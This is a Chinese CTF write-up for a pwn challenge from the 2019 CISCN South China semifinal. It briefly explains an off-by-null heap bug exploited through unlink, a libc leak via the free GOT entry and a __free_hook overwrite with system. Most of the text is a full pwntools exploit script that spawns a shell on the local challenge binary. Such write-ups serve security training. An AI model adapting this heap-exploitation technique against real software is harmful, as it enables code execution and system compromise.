2019CISCN华南赛区半决赛 pwn

程序员文章站 2022-03-24 09:16:07

...

好久没有练过pwn了，，感觉自己pwn 都废了，，近期打算刷一下攻防世界的android 然后刷刷这个华南赛区的pwn。

如果刷的差不多打算继续刷buuoj

pwn1

这个题目真的很有意思感觉出题人费心了

edit 函数已经给限制了

2019CISCN华南赛区半决赛 pwn

然后show 函数也限制了

2019CISCN华南赛区半决赛 pwn

edit 函数????️一个 off by null 由于没有开pie

unlink 就变得很简单

这里必须unlink到 32 的堆块位置，，，要不然够不到key2 也没有 off by null key1

其他就没有啥说的了，，，，

就是off by null

修改key2 off by null key1

然后修改 free hook 就ok


from pwn import*
io=process("./pwn")
elf=ELF("./pwn")
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
context.arch='amd64'
context.log_level = "debug"



def gdb_s():
	gdb.attach(io)
	pause()


def add(index,size,con):
	io.recvuntil("4.show")
	io.sendline("1")
	io.recvuntil("index:")
	io.sendline(str(index))
	io.recvuntil("size:")
	io.sendline(str(size))
	io.recvuntil("content:")
	io.send(con)

def dele(index):
	io.recvuntil("4.show")
	io.sendline("2")
	io.recvuntil("index:")
	io.sendline(str(index))

def edit(index,con):
	io.recvuntil("4.show")
	io.sendline("3")
	io.recvuntil("index:")
	io.sendline(str(index))
	io.recvuntil("content:")
	io.send(con)

def show(index):
	io.recvuntil("4.show")
	io.sendline('4')
	io.recvuntil("index:")
	io.sendline(str(index))

if __name__ =="__main__":
	add(10,0xf0,'1010'+'\n')
	bss_addr=0x6021E0
	heap_len=0x602060
	heap_addrs=0x6020E0
	#gdb_s()
	io.recvuntil("4.show")
	io.sendline("1")
	io.recvuntil("index:")
	io.sendline('16')
	io.recvuntil("size:")
	io.sendline(str(0xf8))
	io.recvuntil("gift: ")
	heap_addr=int(io.recvline(),16)-0x110
	
	log.success("heap_addr "+hex(heap_addr))
	io.recvuntil("content:")
	io.sendline("/bin/sh;")
	add(1,0xf8,"111"+'\n')
	add(2,0xf8,"222"+'\n')
	add(32,0xf8,"3232"+'\n')
	add(31,0xf8,"3131"+'\n')
	add(30,0xf8,"3030"+'\n')
	add(3,0xf8,"3333"+'\n')
	# index 32--> 0x6021c8
	#  key1=6022BC  key2=6022B8
	#unlink
	fd=heap_addrs+0x8*32-0x10-0x8
	payload=p64(0)+p64(0xf0)+p64(fd)+p64(fd+0x8)
	payload=payload.ljust(0xf0,'a')
	payload+=p64(0xf0)

	edit(32,payload)
	
	#gdb_s()
	dele(31)

	#gdb_s()
	#add(5,0xf8,'444'+'\n')
	#add(6,0xf8,'444'+'\n')
	#gdb_s()
	payload=p64(fd)*3+p64(elf.got['free'])
	payload=payload.ljust(0xf0,'a')
	payload+=p64(1)
	edit(32,payload)
	#gdb_s()
	#edit key2=1  key1=1
	show(32)
	#print io.recv
	io.recvline()
	leak=u64(io.recv(6).ljust(8,'\x00'))
	#print leak
	libc_base_addr=leak-libc.sym['free']
	#print libc_base_addr
	log.success("libc_base_addr "+hex(libc_base_addr))

	system_addr=libc_base_addr+libc.sym['system']
	free_hook_addr=libc_base_addr+libc.sym['__free_hook']

	payload=p64(free_hook_addr)*4
	payload=payload.ljust(0xf0,'a')
	payload+=p64(1)

	edit(30,payload)

	edit(30,p64(system_addr))	
	#gdb_s()
	#add(16,0xf8,"3333"+'\n')
	show(16)
	dele(16)


	io.interactive()
	io.close()